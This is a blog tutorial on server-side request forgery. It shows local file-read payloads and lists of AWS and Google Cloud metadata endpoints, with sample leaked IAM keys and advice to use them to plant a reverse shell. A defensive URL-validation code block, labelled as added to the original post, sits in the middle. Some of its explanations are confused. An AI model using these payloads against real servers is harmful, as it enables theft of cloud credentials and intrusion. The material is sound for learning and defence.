Introduction

Hey folks! What's up? This is my second article about SSRF exploitation. If you haven't read part 1, you can read it here. In that article I divided SSRF into two types according to my research: blind SSRF and SSRF via untrusted input. So here I picked remote code execution via untrusted input in SSRF, and I also discuss the role of SSRF in XXE and request smuggling; the next article will be about chaining bugs with SSRF :p I also wanted to cover OS command injection and bypassing admin panel dashboards with server-side request forgery, but for the sake of length I decided to shorten this article.

Basic Plot Overview

This post is all about obtaining remote code execution with SSRF. Since it's not a beginner-friendly article, I hope you have a clear concept of URL terminology; if anything about the structure of a URL is unclear to you, you can read the article written by my friend here. For the concept of SSRF, the back end, the database and how data is fetched from a URL are very important; without these concepts you can't fully understand SSRF. Let me give you an example (this is not a real-world example):

Suppose your friend asks you for a birthday gift and you send it via a courier. Let's map this example onto a web application: you are the back end, the courier is the server and your friend is the user. What happens here is the same as above: you (the back end) give data to the server (the courier), but the server has no understanding of the data it carries; its job is to take data from the back end and serve it to the user. The user fetches data from the server by issuing requests. That's all.

Exploitation

Every web server contains confidential files, used for DB config, admin config, phpinfo(), etc. Since we know how a normal user fetches data from the server by issuing a request, let's take another example. Suppose we have the URL https://www.forttesting.com?file=500.png. What's happening here is that a parameter named file fetches the 500.png file from the web server. But what happens if we change it to https://www.forttesting.com?file=file:///etc/passwd? It gives us the file of users on the server. file:// is a protocol; we talk about these protocols in later sections. If there is no input sanitization it gives us everything blindly, like https://www.forttesting.com?file=http://localhost. In the exploit above, if an SSRF vulnerability is present on the server, we can download the full data of localhost by using wget. That was basic extraction of files, but it would be considered code injection.

So, for obtaining RCE you need some knowledge of cloud computing; if you don't have it, don't worry, read it later. There are mostly two types of cloud platforms used widely: Google Cloud and Amazon Web Services. Let's talk about Amazon Web Services: http://169.254.169.254/latest/meta-data/iam/security-credentials/ is the endpoint that leaks the list of the user's roles with their security credentials. There are many other endpoints by exploiting which we can obtain RCE on AWS, but this one is my favourite, so I wrote about it in this article. Okay! Here is the list of AWS endpoints we can disclose while exploiting SSRF:

http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
Payload credit: cobalt.io

Here are a few payloads I found on cobalt.io, so I added them to the article. After issuing https://www.forttesting.com?file=http://169.254.169.254/latest/meta-data/iam/security-credentials you will get the access key ID, secret key, token, etc., like this:

    {
      "LastUpdated" : "2019-08-03T20:42:03Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
      "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
      "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJHMEUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDs
      "Expiration" : "2019-08-04T03:16:50Z"
    }

Then just set up aws-cli and hack the web application by uploading a reverse shell. That's all about aws-cli: we can take over the user roles and simply hack the web application on AWS. Now, in Google Cloud the method of extracting information and files is the same, but the endpoints are different:

http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
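Before moving on to chained bugs, the defensive counterpart of the fetch above, as an added example that is not part of the original post: a check a back end can run on a user-supplied URL (the file= parameter in the forttesting.com example) before fetching it. It allowlists the scheme so file:// is refused, rejects the metadata host names listed above, and resolves the host and refuses anything that is not a public address, which covers localhost and 169.254.169.254. The resolver is injectable so the check can be tested offline; the function and host names other than those on the page are my own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Internal names from the endpoint lists above plus the loopback name used in
# the file= examples; compared case-insensitively after trailing-dot removal.
BLOCKED_HOSTS = {"localhost", "metadata", "metadata.google.internal", "instance-data"}

def is_public_ip(ip):
    """True only for a globally routable unicast address: 169.254.169.254 is
    link-local and 127.0.0.1 loopback, so neither is global; RFC 1918 ranges
    and IPv6 ::1 / fe80:: / fc00:: fail the same way."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast and not addr.is_reserved

def default_resolver(host):
    """Every A/AAAA answer for host (a literal IP resolves to itself)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def check_fetch_url(url, resolver=default_resolver):
    """Return (allowed, reason) for a user-supplied URL the server would fetch.
    Order matters: allowlist the scheme (file://, gopher://, ... are refused
    outright), reject known internal host names, then resolve and refuse any
    answer that is not public. The resolver is injectable for offline tests."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "missing host"
    if host in BLOCKED_HOSTS:
        return False, f"host {host!r} is an internal name"
    try:
        ips = resolver(host)
    except OSError:  # socket.gaierror is a subclass
        return False, "host does not resolve"
    for ip in ips:
        if not is_public_ip(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"

if __name__ == "__main__":  # literal IP and localhost need no network
    for u in ("file:///etc/passwd", "http://localhost",
              "http://169.254.169.254/latest/meta-data/"):
        print(u, "->", check_fetch_url(u))
```

The name is resolved here and again by the HTTP client, so pin the checked IP when fetching or a DNS rebinding between the two lookups bypasses the check. On the cloud side, requiring IMDSv2 on AWS instances means a plain GET to the metadata endpoints above returns nothing without a session token obtained via PUT.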
That's how RCE works through SSRF; we can patch SSRF by sanitizing the input. Now, how does SSRF work with other bugs? Let's consider HTTP request smuggling: we send data chunked, but how does SSRF play a vital role in this vulnerability? As I said earlier, the server is very innocent and doesn't know what to send. In a request smuggling vulnerability the user manipulates the back end by issuing chunked requests and crafting malicious headers, so with the help of SSRF, HTTP request smuggling can extract dangerous files, which leads to harm to the website.
I also wanted to talk about XML injection with SSRF, but since the article is getting longer I'll end it here. Check the resources; they have awesome writeups about SSRF:
https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/

For further reference:

My First Bug: Blind SSRF Through Profile Picture Upload (infosecwriteups.com)

SSRF (Server Side Request Forgery) (book.hacktricks.xyz)

How To: Server-Side Request Forgery (SSRF) (www.hackerone.com)